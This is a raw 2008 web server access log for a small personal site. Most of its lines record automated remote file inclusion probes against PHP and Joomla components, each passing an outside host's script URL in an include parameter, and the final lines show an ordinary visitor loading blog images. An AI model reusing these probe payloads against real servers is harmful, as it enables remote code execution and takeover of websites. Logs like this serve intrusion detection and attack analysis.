70.84.230.34 - - [19/May/2008:11:58:57 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.230.34 - - [19/May/2008:11:58:58 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:59:36 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:59:38 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:59:39 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.29.95.45 - - [19/May/2008:12:00:01 -0700] "GET /logs//index.php?acao=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.29.95.45 - - [19/May/2008:12:00:03 -0700] "GET //index.php?acao=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.29.95.45 - - [19/May/2008:12:01:02 -0700] "GET /logs//calendar//tools/errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.29.95.45 - - [19/May/2008:12:01:03 -0700] "GET //calendar//tools/errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:01:35 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:01:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:01:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:01:37 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [19/May/2008:12:01:51 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [19/May/2008:12:01:52 -0700] "GET //config/dbutil.bck.php?confdir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [19/May/2008:12:01:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:02:19 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:02:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:02:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:12:02:24 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:12:02:24 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:12:02:38 -0700] "GET //config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:02:54 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:03:05 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:03:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:03:30 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:03:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:03:36 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:43 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:12:03:45 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:54 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:03:59 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:04:06 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:04:16 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.151.162.98 - - [19/May/2008:12:04:27 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:05 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:06 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:12:05:49 -0700] "GET //redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:12:05:49 -0700] "GET /logs//redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:50 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:12:05:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:12:06:17 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:07:16 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:12:07:26 -0700] "GET /logs/access_080218.log/index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [19/May/2008:12:07:27 -0700] "GET //config/dbutil.bck.php?confdir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:12:07:30 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:12:07:35 -0700] "GET /logs/index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:07:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:12:07:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.58.169 - - [19/May/2008:12:08:55 -0700] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:09:13 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:09:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:12:09:25 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:12:09:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:12:09:42 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:12:09:44 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:12:09:45 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:09:51 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:09:51 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:09:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:12:10:29 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:10:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
206.33.2.131 - - [19/May/2008:12:10:49 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [19/May/2008:12:10:50 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.70.129.162 - - [19/May/2008:12:11:41 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [19/May/2008:12:11:42 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [19/May/2008:12:11:43 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.84.31 - - [19/May/2008:12:11:44 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:12:11:57 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:12:11:57 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:12:12:01 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:12:12:09 -0700] "GET /logs/access_080201.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.56.186 - - [19/May/2008:12:12:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:12:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.32.233 - - [19/May/2008:12:12:35 -0700] "GET /logs/access_080201.log//ldap/authldap.php?includePath=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [19/May/2008:12:12:36 -0700] "GET //ldap/authldap.php?includePath=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [19/May/2008:12:12:36 -0700] "GET /logs//ldap/authldap.php?includePath=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:12:12:41 -0700] "GET /logs/access_080327.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:12:12:55 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:01 -0700] "GET /plans/ HTTP/1.1" 200 1111 "http://www.st-owners.com/forums/showthread.php?t=36163" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:14 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:14 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:15 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:19 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:28 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:28 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:32 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:32 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:33 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:34 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
67.19.61.90 - - [19/May/2008:12:13:35 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:38 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:38 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:39 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.45.168.113 - - [19/May/2008:12:13:39 -0700] "GET /blog/wp-content/themes/default/images/kubrickhea